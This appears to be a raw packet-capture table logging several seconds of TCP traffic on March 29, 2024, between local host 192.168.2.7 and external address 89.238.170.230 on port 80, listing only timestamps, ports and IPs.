Mar 29, 2024 14:25:51.709603071 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.872286081 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.872301102 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.872313023 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.872555017 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.872610092 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.932519913 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.932569027 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.932661057 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.932728052 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.933326006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.933407068 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:51.933444023 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:51.933533907 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.099093914 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.099117041 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.099211931 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.154803038 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.154824972 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.154884100 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.154956102 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.155009985 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.155046940 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.155630112 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.155688047 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.155694962 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.155735970 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.330508947 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.330523968 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.330575943 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.330631018 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.384215117 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.384233952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.384246111 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.384289026 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.384296894 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.384340048 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.384346962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.384635925 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.384649992 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.384685040 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.384685993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.384706020 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.384706020 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.384726048 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.384744883 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.544066906 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.544126987 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.601229906 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.601310968 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.601340055 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.601356030 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.601382017 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.601389885 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.601422071 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.602171898 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.602221012 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.602257013 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.602299929 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.602448940 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.602493048 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.602520943 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.602562904 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.602583885 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.602627039 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.757755995 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.757811069 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.757852077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.757879019 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.815799952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.815869093 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.815915108 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.815934896 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.815979004 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.815994978 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.816015959 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.816030979 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.816051006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.816087961 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.816692114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.816740036 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.816740990 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.816778898 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.816867113 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.816919088 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.816946983 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.816988945 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:52.974169970 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:52.974280119 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.031047106 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.031095982 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.031124115 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.031138897 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.031311035 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.031358957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.031363964 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.031407118 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.032263041 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.032306910 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.032308102 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.032321930 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.032346010 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.032361984 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.032367945 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.032380104 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.032392025 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.032407045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.032418966 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.032438040 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.260798931 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.260936975 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.260951042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.260966063 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.261019945 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.261059999 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.261396885 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.261447906 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.261471033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.261508942 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.261807919 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.261853933 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.261878967 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.261924982 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.262296915 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.262336016 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.262360096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.262407064 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.262428999 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.262474060 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.482422113 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.482494116 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.482506037 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.482542992 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.483352900 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.483412027 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.483509064 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.483556032 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.483967066 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.484014988 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.484014988 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.484055996 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.484065056 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.484078884 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.484117985 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.484148026 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.484193087 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.484256029 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.484302044 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.484323025 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.484370947 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.697177887 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.697247028 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.698260069 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.698317051 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.698319912 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.698369980 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.699425936 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.699474096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.699476957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.699511051 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.699542046 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.699587107 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.699634075 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.699678898 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.699743032 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.699786901 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.699822903 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.699866056 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.699867964 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.699899912 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.699907064 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.699944019 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.928066969 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.928154945 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.930301905 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.930356979 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.930500984 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.930547953 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.930565119 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.930604935 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.930773020 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.930788040 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.930819988 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.930835962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.931274891 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.931288004 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.931324005 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.931444883 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.931489944 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.931508064 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.931540966 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:53.931638956 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:53.931685925 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.130721092 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.130811930 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.132390976 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.132433891 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.132742882 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.132759094 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.132786989 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.132810116 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.132913113 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.132930994 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.132953882 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.132967949 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.133135080 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.133176088 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.133183002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.133223057 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.133402109 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.133449078 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.133456945 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.133493900 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.133600950 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.133641005 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.335208893 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.335247993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.335392952 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.336946964 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.337039948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.337208033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.337260008 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.337276936 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.337354898 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.337636948 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.337703943 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.337714911 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.337794065 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.338473082 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.338540077 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.338546991 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.338586092 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.338623047 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.338629007 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.338673115 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.338691950 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.338720083 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.338742018 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.338767052 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.338819981 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.566324949 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.566342115 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.566426039 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.567472935 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.567519903 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.567521095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.567558050 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.568206072 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.568244934 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.568269968 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.568310976 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.568708897 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.568751097 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.568758011 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.568795919 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.568980932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.569021940 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.569047928 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.569087982 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.569413900 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.569457054 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.569498062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.569538116 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.569549084 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.569587946 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.783906937 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.783922911 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.783981085 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.784003019 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.784924030 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.784975052 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.784979105 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.785020113 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.785172939 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.785218954 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.785227060 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.785270929 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.785573959 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.785592079 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.785794020 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.785836935 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.785836935 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.785840034 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.785876989 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.786283016 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.786298037 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.786317110 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:54.786324024 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.786339045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:54.786360025 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.011909962 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.011960983 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.012540102 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.012571096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.012589931 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.012614012 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.012840033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.012901068 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.012912035 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.012929916 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.013159990 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.013173103 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.013202906 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.013215065 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.013314009 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.013328075 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.013356924 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.013375044 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.013715029 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.013756037 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.013761997 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.013797998 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.014220953 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.014319897 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.014348030 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.014359951 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.237344980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.237366915 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.237462997 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.237607002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.237657070 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.237658978 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.237701893 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.238189936 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.238240957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.238250971 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.238295078 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.238312006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.238353014 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.238367081 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.238409996 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.239309072 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.239355087 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.239379883 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.239423037 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.239425898 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.239460945 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.239480019 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:55.239531994 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:55.239644051 CET	80	49699	89.238.170.230	192.168.2.7
